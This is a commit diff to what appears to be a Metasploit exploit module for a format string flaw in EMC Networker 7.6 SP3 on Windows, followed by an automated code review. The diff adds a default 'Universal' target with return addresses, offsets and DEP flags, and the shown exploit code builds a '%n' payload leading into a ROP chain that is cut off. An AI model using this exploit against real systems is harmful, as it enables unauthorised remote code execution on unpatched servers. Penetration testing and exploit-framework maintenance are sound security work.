
Commit 88c9916

author
jvazquez-r7
committed
added universal target
1 parent b8eea10 commit 88c9916


1 file changed

+13
-4
lines changed


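--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -45,20 +45,29 @@ def initialize(info = {})
 },
 'Targets' =>
 [
+['EMC Networker 7.6 SP3 / Windows Universal',
+{
+'Ret' => 0x7c354dac, # ret from MSVCR71.dll
+'Offset' => 156,
+'DEP' => true
+}
+],
 ['EMC Networker 7.6 SP3 / Windows XP SP3',
 {
 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll
-'Offset' => 156
+'Offset' => 156,
+'DEP' => false
 }
 ],
 ['EMC Networker 7.6 SP3 / Windows 2003 SP2',
 {
 'Ret' => 0x7c354dac, # ret from MSVCR71.dll
-'Offset' => 156
+'Offset' => 156,
+'DEP' => true
 }
 ]
 ],
-'DefaultTarget' => 1,
+'DefaultTarget' => 0,
 'Privileged' => true,
 'DisclosureDate' => 'Aug 29 2012'))
 
@@ -73,7 +82,7 @@ def exploit
 
 fs = "%n" * target['Offset']
 fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll
-if target.name =~ /Windows 2003/
+if target['DEP']
 rop_gadgets =
 [
 # rop chain generated with mona.py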
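Review bot: The trailing comment on `fs << [target.ret].pack("V")` in `exploit` still reads `# push esp # ret from MSVCR71.dll`, but after this change two of the three targets (Universal, now the default, and 2003 SP2) supply the address documented as a plain `ret`, so the comment is wrong for the default path; something like `# target-specific return address in MSVCR71.dll (see 'Targets')` would stay accurate. The new Universal entry and the 2003 SP2 entry now carry identical `Ret`, `Offset` and `DEP` values, so a one-line comment on the Universal target saying why it is expected to hold on every listed platform would help the next maintainer; presumably it relies on the same MSVCR71.dll build being present everywhere, which is not visible here. It is also worth a comment that `'DEP'` must be set on every target, because `if target['DEP']` treats a missing key as `false` without any warning. The body of `exploit` and the ROP chain continue past the end of the hunk, so the chain itself was not reviewed.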
